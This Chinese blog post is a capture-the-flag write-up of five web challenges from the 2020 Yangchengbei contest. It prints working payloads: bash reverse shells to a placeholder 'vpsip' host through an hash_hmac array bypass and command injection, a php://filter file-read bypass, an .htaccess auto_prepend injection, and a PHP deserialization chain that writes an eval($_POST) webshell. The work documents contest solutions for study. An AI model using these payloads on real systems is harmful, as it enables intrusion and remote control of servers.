reader-l's blog

虽然很慢,但仍在前进

0%

2020羊城杯web-wp

#

1.easycon#

直接蚁剑直连

将bbbbbbbbb.txt文件下载后,用base64解码后,转换为图片格式拿到flag.

2.Blackcat#

有原题:https://www.securify.nl/blog/spot-the-bug-challenge-2018-warm-up

下载黑猫警长的mp3文件,发现源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<?php
if(empty($_POST['Black-Cat-Sheriff']) || empty($_POST['One-ear'])){
die('谁!竟敢踩我一只耳的尾巴!');
}

$clandestine = getenv("clandestine");

if(isset($_POST['White-cat-monitor']))
$clandestine = hash_hmac('sha256', $_POST['White-cat-monitor'], $clandestine);


$hh = hash_hmac('sha256', $_POST['One-ear'], $clandestine);

if($hh !== $_POST['Black-Cat-Sheriff']){
die('有意瞄准,无意击发,你的梦想就是你要瞄准的目标。相信自己,你就是那颗射中靶心的子弹。');
}
echo "nc".$_POST['One-ear'];
echo exec("nc".$_POST['One-ear']);

hash_hmac这个函数处理数组的时候会返回false

$clandestine = hash_hmac('sha256', 数组, $clandestine) == false;

这样的话:$hh = hash_hmac('sha256', $_POST['One-ear'], false);

payload:

1
2
3
4
5
6
7
8

<?php
$cmd0=";bash -c 'bash -i >%26 /dev/tcp/vpsip/8888 0>%261'";;
//$cmd = ';cat flag.php';
$cmd = ";bash -c 'bash -i >& /dev/tcpvpsip/8888 0>&1'";
$hmac = hash_hmac('sha256', $cmd, false);
echo "White-cat-monitor[]=a&One-ear=".$cmd0."&Black-Cat-Sheriff=".$hmac;
//White-cat-monitor[]=a&One-ear=;bash -c 'bash -i >%26 /dev/tcp/vps/8888 0>%261'&Black-Cat-Sheriff=7b274163fd3820243f8cd99e49e71735f9faec25bff2a96d6ff3b6aab7ab1310

3.easyphp2#

任意文件读取,尝试读取GWHT.php源码

采用url二次编码绕过

payload:

http://183.129.189.60:10025/?file=php://filter/convert.b%25%36%31se64-encode/resource=GWHT.php

GWHT.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
<!DOCTYPE html>
<html lang="en">

<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>count is here</title>

<style>

html,
body {
overflow: none;
max-height: 100vh;
}

</style>
</head>

<body style="height: 100vh; text-align: center; background-color: green; color: blue; display: flex; flex-direction: column; justify-content: center;">

<center><img src="question.jpg" height="200" width="200" /> </center>

<?php
ini_set('max_execution_time', 5);

if ($_COOKIE['pass'] !== getenv('PASS')) {
setcookie('pass', 'PASS');
die('<h2>'.'<hacker>'.'<h2>'.'<br>'.'<h1>'.'404'.'<h1>'.'<br>'.'Sorry, only people from GWHT are allowed to access this website.'.'23333');
}
?>

<h1>A Counter is here, but it has someting wrong</h1>

<form>
<input type="hidden" value="GWHT.php" name="file">
<textarea style="border-radius: 1rem;" type="text" name="count" rows=10 cols=50></textarea><br />
<input type="submit">
</form>

<?php
if (isset($_GET["count"])) {
$count = $_GET["count"];
if(preg_match('/;|base64|rot13|base32|base16|<\?php|#/i', $count)){
die('hacker!');
}
echo "<h2>The Count is: " . exec('printf \'' . $count . '\' | wc -c') . "</h2>";
}
?>

</body>

</html>

审计代码发现,可以通过拼接反弹shell,但是需要知道$_COOKIE['pass']

robots.txt提示有check.php

1
2
3
4
5
6
<?php
$pass = "GWHT";
// Cookie password.
echo "Here is nothing, isn't it ?";

header('Location: /');

得到要传入的cookie值

payload:

1
2
3
4
5
6
7
8
9
GET /GWHT.php?count=a%27%26%26bash+%2dc+%22bash+%2di+%3E%26+/dev/tcp/vpsip/8888+0%3E%261%22%27||GWHT.php HTTP/1.1
Host: 183.129.189.60:10025
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: pass=GWHT
Connection: close

为了更直观的,写了一句话上去

发现了flag的所在地,但是没有权限

需要用GWHT或者root用户的权限才行。

README文件中发现密码hash值

解出来得到GWHTCTF

4.easyphp#

这是xnuca 2019的一道原题

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
 <?php
$files = scandir('./');
foreach($files as $file) {
if(is_file($file)){
if ($file !== "index.php") {
unlink($file);
}
}
}
if(!isset($_GET['content']) || !isset($_GET['filename'])) {
highlight_file(__FILE__);
die();
}
$content = $_GET['content'];
if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) {
echo "Hacker";
die();
}
$filename = $_GET['filename'];
if(preg_match("/[^a-z\.]/", $filename) == 1) {
echo "Hacker";
die();
}
$files = scandir('./');
foreach($files as $file) {
if(is_file($file)){
if ($file !== "index.php") {
unlink($file);
}
}
}
file_put_contents($filename, $content . "\nHello, world");
?>

在目录下,只有index.php能够作为php解析执行,于是我们可以写一个.htaccess让index.php自动包含执行代码。

payload:

1
?content=php_value%20auto_prepend_fil\%0ae%20.htaccess%0a%23<?php%20system('cat%20/fla'.'g');?>\&filename=.htaccess

5.easyser#

robots.txt提示有star1.php文件。

用http协议,传入参数path

1
http://127.0.0.1/sandbox/702pnnqtjj5fokihj14dn9ss7s/star1.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
 <?php
error_reporting(0);
if ( $_SERVER['REMOTE_ADDR'] == "127.0.0.1" ) {
highlight_file(__FILE__);
}
$flag='{Trump_:"fake_news!"}';

class GWHT{
public $hero;
public function __construct(){
$this->hero = new Yasuo;
}
public function __toString(){
if (isset($this->hero)){
return $this->hero->hasaki();
}else{
return "You don't look very happy";
}
}
}
class Yongen{ //flag.php
public $file;
public $text;
public function __construct($file='',$text='') {
$this -> file = $file;
$this -> text = $text;

}
public function hasaki(){
$d = '<?php die("nononon");?>';
$a= $d. $this->text;
@file_put_contents($this-> file,$a);
}
}
class Yasuo{
public function hasaki(){
return "I'm the best happy windy man";
}
}

?>

看这个就知道有可能是反序列化了

利用php伪协议。

payload:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
<?php
//error_reporting(0);
//if ( $_SERVER['REMOTE_ADDR'] == "127.0.0.1" ) {
// highlight_file(__FILE__);
//}
//$flag='{Trump_:"fake_news!"}';

class GWHT{
public $hero;
public function __construct($hero){
// $this->hero = new Yasuo;
$this->hero = $hero;
}
// public function __toString(){
// if (isset($this->hero)){
// return $this->hero->hasaki();
// }else{
// return "You don't look very happy";
// }
// }
}
class Yongen{ //flag.php
public $file;
public $text;
public function __construct($file='',$text='') {
$this -> file = $file;
$this -> text = $text;

}
// public function hasaki(){
/* $d = '<?php die("nononon");?>';*/
// $a= $d. $this->text;
// @file_put_contents($this-> file,$a);
// }
}
//class Yasuo{
// public function hasaki(){
// return "I'm the best happy windy man";
// }
//}
$file = "php://filter/string.strip_tags|convert.base64-decode/resource=reader.php";
$text = "PD9waHAgZXZhbCgkX1BPU1RbMTIzXSk7Pz4=";
$test = new Yongen($file,$text);
$tesg = new GWHT($test);
echo urlencode(serialize($tesg));
#O%3A4%3A%22GWHT%22%3A1%3A%7Bs%3A4%3A%22hero%22%3BO%3A6%3A%22Yongen%22%3A2%3A%7Bs%3A4%3A%22file%22%3Bs%3A72%3A%22php%3A%2F%2Ffilter%2Fstring.strip_tags%7Cconvert.base64-decode%2Fresource%3Dreader.php%22%3Bs%3A4%3A%22text%22%3Bs%3A36%3A%22PD9waHAgZXZhbCgkX1BPU1RbMTIzXSk7Pz4%3D%22%3B%7D%7D

?>